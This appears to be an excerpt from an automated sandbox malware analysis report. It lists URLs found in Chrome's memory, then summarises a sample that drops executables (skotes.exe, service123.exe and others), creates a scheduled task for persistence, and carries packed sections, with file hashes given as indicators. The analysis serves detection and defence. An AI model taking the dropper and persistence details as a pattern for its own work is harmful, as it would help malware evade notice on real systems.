Source: chrome.exe, 00000009.00000003.2814459000.000069E40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814201560.000069E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000009.00000003.2814971799.000069E400684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj
Source: chrome.exe, 00000009.00000002.2843751187.000069E40078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814971799.000069E400684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.2814459000.000069E40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814201560.000069E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000009.00000003.2814971799.000069E400684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000009.00000003.2814971799.000069E400684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845486367.000079F40220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000009.00000002.2850378598.000079F402884000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854441689.000079F402DF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000009.00000003.2822007193.000079F40256C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000009.00000002.2851946643.000079F402A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851902577.000079F402A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000009.00000002.2851946643.000079F402A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851902577.000079F402A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000009.00000002.2843677836.000069E400770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000009.00000002.2842564179.000069E400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853505778.000079F402C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843677836.000069E400770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000009.00000003.2814459000.000069E40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814201560.000069E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000009.00000003.2814459000.000069E40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814201560.000069E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000009.00000002.2843677836.000069E400770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000009.00000002.2842564179.000069E400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843677836.000069E400770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardi
Source: chrome.exe, 00000009.00000002.2843677836.000069E400770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000009.00000003.2814459000.000069E40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2814201560.000069E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000009.00000003.2815351690.000069E4006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000009.00000002.2843962260.000069E40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000009.00000002.2843751187.000069E40078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000009.00000002.2843751187.000069E40078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000009.00000002.2843642526.000069E400744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000009.00000002.2848223299.000079F40251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2818657534.000079F4023C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000009.00000002.2846564171.000079F4022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000009.00000002.2846564171.000079F4022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000009.00000002.2846564171.000079F4022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000009.00000002.2848597178.000079F402594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846564171.000079F4022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2849378066.000079F40275C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.2851547431.000079F402980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853258398.000079F402BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848852079.000079F402668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.2851547431.000079F402980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853258398.000079F402BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848852079.000079F402668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000002.2848852079.000079F402668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.2853258398.000079F402BDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000009.00000002.2847466949.000079F40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000009.00000002.2855126656.000079F402EA5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856494134.000079F40306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.2856610051.000079F403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856494134.000079F40306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2831918898.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853960880.000079F402D10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000003.2831918898.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847994242.000079F4024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.2847994242.000079F4024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000003.2831918898.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.2856494134.000079F40306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2831918898.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000009.00000002.2855126656.000079F402EA5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856494134.000079F40306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2831918898.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856374637.000079F403040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2856456162.000079F403060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000002.2853258398.000079F402BDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000009.00000002.2853258398.000079F402BDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000002.2846099339.000079F40228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000009.00000002.2846364687.000079F4022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000009.00000002.2851946643.000079F402A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851902577.000079F402A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2851946643.000079F402A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851902577.000079F402A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000009.00000002.2853505778.000079F402C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000009.00000002.2848945070.000079F4026C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000009.00000002.2854971701.000079F402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000009.00000002.2854971701.000079F402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000009.00000002.2854971701.000079F402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000009.00000002.2848179595.000079F402508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846099339.000079F40228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000009.00000003.2832861964.000079F40311C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000009.00000002.2851994254.000079F402A6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853139133.000079F402BA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2852121049.000079F402ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000009.00000002.2847337134.000079F4023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2853139133.000079F402BA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2852121049.000079F402ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000009.00000002.2856796141.000079F4030C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000009.00000002.2854526615.000079F402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851547431.000079F402980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849378066.000079F40275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850165737.000079F402834000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000009.00000002.2854526615.000079F402E0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoc_state
Source: chrome.exe, 00000009.00000002.2849378066.000079F40275C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoy
Source: chrome.exe, 00000009.00000002.2847692834.000079F402498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000009.00000002.2849241714.000079F402730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000009.00000002.2853700513.000079F402CA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000009.00000002.2845622159.000079F40221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000009.00000002.2847466949.000079F40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000009.00000002.2847466949.000079F40240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000009.00000002.2847466949.000079F40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850165737.000079F402834000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000009.00000002.2847466949.000079F40240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2854401365.000079F402DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000009.00000002.2849034150.000079F4026E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000009.00000002.2847994242.000079F4024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822346250.000079F4028F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2851097795.000079F402934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443

System Summary
barindex
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File dump: service123.exe.7.dr 274604032 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 843a4bb3a5.exe.6.dr Static PE information: section name:
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: .rsrc
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: .idata
Source: 843a4bb3a5.exe.6.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BFE530 6_2_00BFE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C378BB 6_2_00C378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C37049 6_2_00C37049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C38860 6_2_00C38860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BF4DE0 6_2_00BF4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C331A8 6_2_00C331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C32D10 6_2_00C32D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C3779B 6_2_00C3779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BF4B30 6_2_00BF4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C27F36 6_2_00C27F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe C4ABB786F92D0BA4D99EF315BF29295B80FB292007DE373891705D28AA10BE97
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe C4ABB786F92D0BA4D99EF315BF29295B80FB292007DE373891705D28AA10BE97
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C71570B0770028AD3E31C790390AB3ED7CB582B561CB5A775EA1BB541EB6967E
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982810371253406
Source: file.exe Static PE information: Section: durrfrps ZLIB complexity 0.9942241020006063
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982810371253406
Source: skotes.exe.0.dr Static PE information: Section: durrfrps ZLIB complexity 0.9942241020006063
Source: random[1].exe.6.dr Static PE information: Section: snkouwyn ZLIB complexity 0.994672140205092
Source: 843a4bb3a5.exe.6.dr Static PE information: Section: snkouwyn ZLIB complexity 0.994672140205092
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: service123.exe.7.dr Binary string: \Device\LanmanRedirector
Source: service123.exe.7.dr Binary string: \Device\Tcpip_{32CB138B-8507-4CEC-BA14-FC0247804FD4}\Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: service123.exe.7.dr Binary string: \Device\Mup
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{53b39e87-18c4-11ea-a811-000d3aa4692b}.TxR.blf
Source: service123.exe.7.dr Binary string: 4\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC!&
Source: service123.exe.7.dr Binary string: eA\Device\HarddiskVolume3\Users\user\Desktop\OfficeSetup.exevk
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE'"&
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\OpenWith.exe110
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{53b39e87-18c4-11ea-a811-000d3aa4692b}.TxR
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files\7-Zip\7zFM.exe
